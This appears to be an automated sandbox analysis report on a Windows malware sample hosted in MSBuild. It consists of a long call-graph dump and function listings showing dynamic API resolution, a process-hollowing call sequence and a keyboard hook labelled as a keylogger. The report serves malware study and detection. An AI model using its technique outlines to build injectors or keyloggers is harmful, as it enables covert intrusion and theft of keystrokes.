41aec8 28 API calls 54027->54028 54030 41227d 54028->54030 54032 4027ec 28 API calls 54030->54032 54034 4122b2 54032->54034 54033 41ad46 28 API calls 54035 412146 54033->54035 54036 4027cb 28 API calls 54034->54036 54037 4027ec 28 API calls 54035->54037 54038 4122c1 54036->54038 54039 412176 54037->54039 54040 4027cb 28 API calls 54038->54040 54041 4027cb 28 API calls 54039->54041 54043 4122cd 54040->54043 54042 412185 54041->54042 54045 4027cb 28 API calls 54042->54045 54044 4027cb 28 API calls 54043->54044 54046 4122dc 54044->54046 54047 412194 54045->54047 54048 4027cb 28 API calls 54046->54048 54049 4027cb 28 API calls 54047->54049 54050 4122eb 54048->54050 54051 4121a3 54049->54051 54052 4027cb 28 API calls 54050->54052 54053 4027cb 28 API calls 54051->54053 54054 4122fa 54052->54054 54055 4121b2 54053->54055 54056 4027cb 28 API calls 54054->54056 54057 4027cb 28 API calls 54055->54057 54058 412309 54056->54058 54059 4121be 54057->54059 54147 40275c 28 API calls 54058->54147 54061 4027cb 28 API calls 54059->54061 54063 4121ca 54061->54063 54062 412313 54064 404468 60 API calls 54062->54064 54145 40275c 28 API calls 54063->54145 54066 412320 54064->54066 54068 401eea 26 API calls 54066->54068 54067 4121d9 54069 4027cb 28 API calls 54067->54069 54070 41232c 54068->54070 54071 4121e5 54069->54071 54072 401eea 26 API calls 54070->54072 54146 40275c 28 API calls 54071->54146 54075 412338 54072->54075 54074 4121ef 54077 404468 60 API calls 54074->54077 54076 401eea 26 API calls 54075->54076 54078 412344 54076->54078 54079 4121fc 54077->54079 54080 401eea 26 API calls 54078->54080 54081 401eea 26 API calls 54079->54081 54082 412350 54080->54082 54083 412205 54081->54083 54084 401eea 26 API calls 54082->54084 54085 401eea 26 API calls 54083->54085 54086 412359 54084->54086 54087 41220e 54085->54087 54088 401eea 26 API calls 54086->54088 54089 401eea 26 API calls 54087->54089 54090 412362 54088->54090 54091 412217 54089->54091 54092 401eea 26 API calls 54090->54092 54093 401eea 26 API calls 54091->54093 54117 412268 54092->54117 54094 412220 54093->54094 54095 401eea 26 API calls 54094->54095 54097 41222c 54095->54097 54096 401eea 26 API calls 54098 412374 54096->54098 54099 401eea 26 API calls 54097->54099 54100 401e13 26 API calls 54098->54100 54101 412238 54099->54101 54102 412380 54100->54102 54103 401eea 26 API calls 54101->54103 54105 401eea 26 API calls 54102->54105 54104 412244 54103->54104 54107 401eea 26 API calls 54104->54107 54106 41238c 54105->54106 54108 401eea 26 API calls 54106->54108 54109 412250 54107->54109 54110 412398 54108->54110 54111 401eea 26 API calls 54109->54111 54112 401eea 26 API calls 54110->54112 54113 41225c 54111->54113 54114 4123a4 54112->54114 54115 401eea 26 API calls 54113->54115 54116 401eea 26 API calls 54114->54116 54115->54117 54118 4123b0 54116->54118 54117->54096 54119 401eea 26 API calls 54118->54119 54120 4123bc 54119->54120 54121 401eea 26 API calls 54120->54121 54122 4123c8 54121->54122 54123 401eea 26 API calls 54122->54123 54124 4123d4 54123->54124 54125 401eea 26 API calls 54124->54125 54126 4123e0 54125->54126 54127 401eea 26 API calls 54126->54127 54128 411c50 54127->54128 54128->53986 54130 412435 54129->54130 54132 412406 54129->54132 54131 412444 54130->54131 54151 10001c5b 54130->54151 54133 403b40 28 API calls 54131->54133 54148 410b0d 54132->54148 54134 412450 54133->54134 54136 401eea 26 API calls 54134->54136 54138 4120f4 54136->54138 54138->54024 54142 41aed5 54141->54142 54143 401f86 28 API calls 54142->54143 54144 412131 54143->54144 54144->54033 54145->54067 54146->54074 54147->54062 54156 410b19 54148->54156 54152 10001c6b ___scrt_fastfail 54151->54152 54203 100012ee 54152->54203 54154 10001c87 54154->54131 54155 410d8d 28 API calls _Yarn 54155->54130 54187 4105b9 54156->54187 54158 410b38 54160 4105b9 SetLastError 54158->54160 54173 410c1f SetLastError 54158->54173 54184 410b15 54158->54184 54162 410b5f 54160->54162 54161 410bbf GetNativeSystemInfo 54163 410bd6 54161->54163 54162->54161 54162->54162 54162->54173 54162->54184 54163->54173 54190 410abe VirtualAlloc 54163->54190 54165 410bfe 54166 410c26 GetProcessHeap HeapAlloc 54165->54166 54200 410abe VirtualAlloc 54165->54200 54168 410c3d 54166->54168 54169 410c4f 54166->54169 54201 410ad5 VirtualFree 54168->54201 54172 4105b9 SetLastError 54169->54172 54170 410c16 54170->54166 54170->54173 54174 410c98 54172->54174 54173->54184 54175 410d45 54174->54175 54191 410abe VirtualAlloc 54174->54191 54202 410eb0 GetProcessHeap HeapFree 54175->54202 54178 410cb1 ctype 54192 4105cc SetLastError ctype ___scrt_fastfail 54178->54192 54180 410cdd 54180->54175 54193 410975 SetLastError SetLastError 54180->54193 54182 410d04 54182->54175 54194 410769 54182->54194 54184->54155 54185 410d0f 54185->54175 54185->54184 54186 410d3a SetLastError 54185->54186 54186->54175 54188 4105c8 54187->54188 54189 4105bd SetLastError 54187->54189 54188->54158 54189->54158 54190->54165 54191->54178 54192->54180 54193->54182 54197 410790 54194->54197 54195 4106d3 VirtualProtect 54196 410891 54195->54196 54196->54185 54197->54196 54198 4106d3 VirtualProtect 54197->54198 54199 41087f 54197->54199 54198->54197 54199->54195 54200->54170 54201->54173 54202->54184 54204 10001324 ___scrt_fastfail 54203->54204 54205 100013b7 GetEnvironmentVariableW 54204->54205 54229 100010f1 54205->54229 54208 100010f1 57 API calls 54209 10001465 54208->54209 54210 100010f1 57 API calls 54209->54210 54211 10001479 54210->54211 54212 100010f1 57 API calls 54211->54212 54213 1000148d 54212->54213 54214 100010f1 57 API calls 54213->54214 54215 100014a1 54214->54215 54216 100010f1 57 API calls 54215->54216 54217 100014b5 lstrlenW 54216->54217 54218 100014d2 54217->54218 54219 100014d9 lstrlenW 54217->54219 54218->54154 54220 100010f1 57 API calls 54219->54220 54221 10001501 lstrlenW lstrcatW 54220->54221 54222 100010f1 57 API calls 54221->54222 54223 10001539 lstrlenW lstrcatW 54222->54223 54224 100010f1 57 API calls 54223->54224 54225 1000156b lstrlenW lstrcatW 54224->54225 54226 100010f1 57 API calls 54225->54226 54227 1000159d lstrlenW lstrcatW 54226->54227 54228 100010f1 57 API calls 54227->54228 54228->54218 54230 10001118 ___scrt_fastfail 54229->54230 54231 10001129 lstrlenW 54230->54231 54232 10002c40 ___scrt_fastfail 54231->54232 54233 10001148 lstrcatW lstrlenW 54232->54233 54234 10001177 lstrlenW FindFirstFileW 54233->54234 54235 10001168 lstrlenW 54233->54235 54236 100011a0 54234->54236 54237 100011e1 54234->54237 54235->54234 54238 100011c7 FindNextFileW 54236->54238 54239 100011aa 54236->54239 54237->54208 54238->54236 54241 100011da FindClose 54238->54241 54239->54238 54240 10001000 49 API calls 54239->54240 54240->54239 54241->54237 54243 401fbd 28 API calls 54242->54243 54244 414bbd SetEvent 54243->54244 54245 414bd2 54244->54245 54246 403b60 28 API calls 54245->54246 54247 414bec 54246->54247 54248 401fbd 28 API calls 54247->54248 54249 414bfc 54248->54249 54250 401fbd 28 API calls 54249->54250 54251 414c0e 54250->54251 54252 41afc3 28 API calls 54251->54252 54253 414c17 54252->54253 54254 414d8a 54253->54254 54256 414c37 GetTickCount 54253->54256 54316 414d99 54253->54316 54255 401d8c 26 API calls 54254->54255 54257 4161fb 54255->54257 54258 41ad46 28 API calls 54256->54258 54260 401eea 26 API calls 54257->54260 54261 414c4d 54258->54261 54259 414dad 54326 404ab1 83 API calls 54259->54326 54263 416207 54260->54263 54321 41aca0 GetLastInputInfo GetTickCount 54261->54321 54266 401eea 26 API calls 54263->54266 54265 414d7d 54265->54254 54268 416213 54266->54268 54267 414c54 54269 41ad46 28 API calls 54267->54269 54270 414c5f 54269->54270 54271 41ac52 30 API calls 54270->54271 54272 414c6d 54271->54272 54273 41aec8 28 API calls 54272->54273 54274 414c7b 54273->54274 54275 401d64 28 API calls 54274->54275 54276 414c89 54275->54276 54277 4027ec 28 API calls 54276->54277 54278 414c97 54277->54278 54322 40275c 28 API calls 54278->54322 54280 414ca6 54281 4027cb 28 API calls 54280->54281 54282 414cb5 54281->54282 54323 40275c 28 API calls 54282->54323 54284 414cc4 54285 4027cb 28 API calls 54284->54285 54286 414cd0 54285->54286 54324 40275c 28 API calls 54286->54324 54288 414cda 54289 404468 60 API calls 54288->54289 54290 414ce9 54289->54290 54291 401eea 26 API calls 54290->54291 54292 414cf2 54291->54292 54293 401eea 26 API calls 54292->54293 54294 414cfe 54293->54294 54295 401eea 26 API calls 54294->54295 54296 414d0a 54295->54296 54297 401eea 26 API calls 54296->54297 54298 414d16 54297->54298 54299 401eea 26 API calls 54298->54299 54300 414d22 54299->54300 54301 401eea 26 API calls 54300->54301 54302 414d2e 54301->54302 54303 401e13 26 API calls 54302->54303 54304 414d3a 54303->54304 54305 401eea 26 API calls 54304->54305 54306 414d43 54305->54306 54307 401eea 26 API calls 54306->54307 54308 414d4c 54307->54308 54309 401d64 28 API calls 54308->54309 54310 414d57 54309->54310 54311 43a5e7 _strftime 42 API calls 54310->54311 54312 414d64 54311->54312 54313 414d69 54312->54313 54314 414d8f 54312->54314 54317 414d82 54313->54317 54318 414d77 54313->54318 54315 401d64 28 API calls 54314->54315 54315->54316 54316->54254 54316->54259 54319 404915 104 API calls 54317->54319 54325 4049ba 81 API calls 54318->54325 54319->54254 54321->54267 54322->54280 54323->54284 54324->54288 54325->54265 54326->54265 54327->53859 54328->53864 54329->53866 54332 40cc3f 54331->54332 54333 403b9e 28 API calls 54332->54333 54334 40ca3a 54333->54334 54335 402860 54334->54335 54338 40286f 54335->54338 54336 4028b1 54344 402daf 54336->54344 54338->54336 54340 4028a6 54338->54340 54339 4028af 54339->53258 54343 402d68 28 API calls 54340->54343 54342->53237 54343->54339 54345 402dbb 54344->54345 54346 4030f7 28 API calls 54345->54346 54347 402dcd 54346->54347 54347->54339 54350 40e56a 54348->54350 54349 4124b7 3 API calls 54349->54350 54350->54349 54351 40e59c 54350->54351 54353 40e60e 54350->54353 54355 40e5fe Sleep 54350->54355 54352 4082dc 28 API calls 54351->54352 54351->54355 54357 41ae08 28 API calls 54351->54357 54363 401e13 26 API calls 54351->54363 54366 401f66 28 API calls 54351->54366 54370 4126d2 29 API calls 54351->54370 54381 40bf04 73 API calls ___scrt_fastfail 54351->54381 54382 412774 29 API calls 54351->54382 54352->54351 54354 4082dc 28 API calls 54353->54354 54358 40e619 54354->54358 54355->54350 54357->54351 54359 41ae08 28 API calls 54358->54359 54360 40e625 54359->54360 54383 412774 29 API calls 54360->54383 54363->54351 54364 40e638 54365 401e13 26 API calls 54364->54365 54367 40e644 54365->54367 54366->54351 54368 401f66 28 API calls 54367->54368 54369 40e655 54368->54369 54371 4126d2 29 API calls 54369->54371 54370->54351 54372 40e668 54371->54372 54384 411699 TerminateProcess WaitForSingleObject 54372->54384 54374 40e670 ExitProcess 54385 411637 61 API calls 54380->54385 54382->54351 54383->54364 54384->54374 54386 41569e 54387 401d64 28 API calls 54386->54387 54388 4156b3 54387->54388 54389 401fbd 28 API calls 54388->54389 54390 4156bb 54389->54390 54391 401d64 28 API calls 54390->54391 54392 4156cb 54391->54392 54393 401fbd 28 API calls 54392->54393 54394 4156d3 54393->54394 54397 411aed 54394->54397 54398 4041f1 3 API calls 54397->54398 54399 411b01 54398->54399 54400 40428c 96 API calls 54399->54400 54401 411b09 54400->54401 54402 4027ec 28 API calls 54401->54402 54403 411b22 54402->54403 54404 4027cb 28 API calls 54403->54404 54405 411b2c 54404->54405 54406 404468 60 API calls 54405->54406 54407 411b36 54406->54407 54408 401eea 26 API calls 54407->54408 54409 411b3e 54408->54409 54410 4045d5 260 API calls 54409->54410 54411 411b4c 54410->54411 54412 401eea 26 API calls 54411->54412 54413 411b54 54412->54413 54414 401eea 26 API calls 54413->54414 54415 411b5c 54414->54415

                                                                                                                                            Executed Functions

                                                                                                                                            Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                            • API String ID: 384173800-625181639
                                                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                                                            Function 00417245 Relevance: 61.5, APIs: 29, Strings: 6, Instructions: 290nativelibraryloaderCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 451 4175cf-4175d9 449->451 450->449 452 4172ec-4172f3 450->452 452->449 453 4172f9-4172fb 452->453 453->449 454 417301-41732d call 436050 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ad0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ad0 479->480 491 41750b-417512 480->491 481->482 484 41752a-41753b call 417651 481->484 485 417544-417560 WriteProcessMemory 482->485 486 417566-41757d Wow64SetThreadContext 482->486 484->482 485->463 489 417562 485->489 486->463 490 41757f-41758b ResumeThread 486->490 489->486 490->463 493 41758d-41758f 490->493 491->478 493->451
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                            • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                            • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`v$ntdll
                                                                                                                                            • API String ID: 3150337530-48330694
                                                                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                                                            Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1638 4099e4-4099fd 1639 409a63-409a73 GetMessageA 1638->1639 1640 4099ff-409a19 SetWindowsHookExA 1638->1640 1641 409a75-409a8d TranslateMessage DispatchMessageA 1639->1641 1642 409a8f 1639->1642 1640->1639 1645 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1640->1645 1641->1639 1641->1642 1643 409a91-409a96 1642->1643 1645->1643
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                            • String ID: Keylogger initialization failure: error $`v
                                                                                                                                            • API String ID: 3219506041-557476379
                                                                                                                                            • Opcode ID: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                            • Opcode Fuzzy Hash: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                                                            Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1656 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1663 10001177-1000119e lstrlenW FindFirstFileW 1656->1663 1664 10001168-10001172 lstrlenW 1656->1664 1665 100011a0-100011a8 1663->1665 1666 100011e1-100011e9 1663->1666 1664->1663 1667 100011c7-100011d8 FindNextFileW 1665->1667 1668 100011aa-100011c4 call 10001000 1665->1668 1667->1665 1670 100011da-100011db FindClose 1667->1670 1668->1667 1670->1666
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1083526818-0
                                                                                                                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                            Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                                                            Download Yara Rule

